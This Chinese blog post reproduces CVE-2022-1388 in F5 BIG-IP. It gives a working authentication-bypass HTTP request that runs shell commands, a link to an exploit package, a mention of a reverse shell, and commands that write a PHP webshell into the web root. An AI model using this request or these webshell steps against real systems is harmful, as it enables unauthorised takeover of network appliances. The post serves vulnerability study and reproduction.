0%
毅种循环

返回

CVE-2022-1388 F5 BIG-IP未授权RCE漏洞&写WebshellBlur image

漏洞描述#

漏洞描述:

在 F5 BIG-IP 16.1.x 16.1.2.2 之前的版本、15.1.5.1 之前的 15.1.x 版本、14.1.4.6 之前的

14.1.x 版本、13.1.5 之前的 13.1.x 版本以及所有 12.1.x和 11.6.x 版本,未公开的请求可能会绕过

iControl REST 身份验证。注意:未评估已达到技术支持终止 (EoTS) 的软件版本.

复现过程#

HTTP请求包如下:

POST /mgmt/tm/util/bash HTTP/1.1
Host:xxxxxxx
Connection: keep-alive, x-F5-Auth-Token
X-F5-Auth-Token: anything
Authorization: Basic YWRtaW46
Content-Length: 45
Content-Type:application/json
{
"command":"run",
"utilCmdArgs":"-c id"
}
makefile

img 1679539049077 3b2d71

EXP/POC#

CVE-2022-1388-EXP-main.zip

Webshell写入#

img 1679539049329 5fa761

反弹获得了shell。

Webshell的写入可以参考另外一个漏洞F5 BIG-IP CVE-2020-5902

写入的路径为:/usr/local/www

mount -o remount -rw /usr
echo "<?php phpinfo();?> " > /usr/local/www/test.php
mount -o remount -r /usr
plain

访问路径:

img 1679539049463 486a2f

img 1679539049561 7bae7d

参考#

F5 BIG-IP远程代码执行漏洞复现(CVE-2020-5902)

CVE-2020-5902:F5 BIG-IP RCE分析研究

CVE-2022-1388 F5 BIG-IP未授权RCE漏洞&写Webshell
https://astro-pure.js.org/blog/cve-2022-1388-f5-rce
本文作者 r3rk04·謊言無法穿透石灰水泥
发布于 2025年5月17日
版权声明 CC BY-NC-SA 4.0
Comment seems to stuck. Try to refresh?✨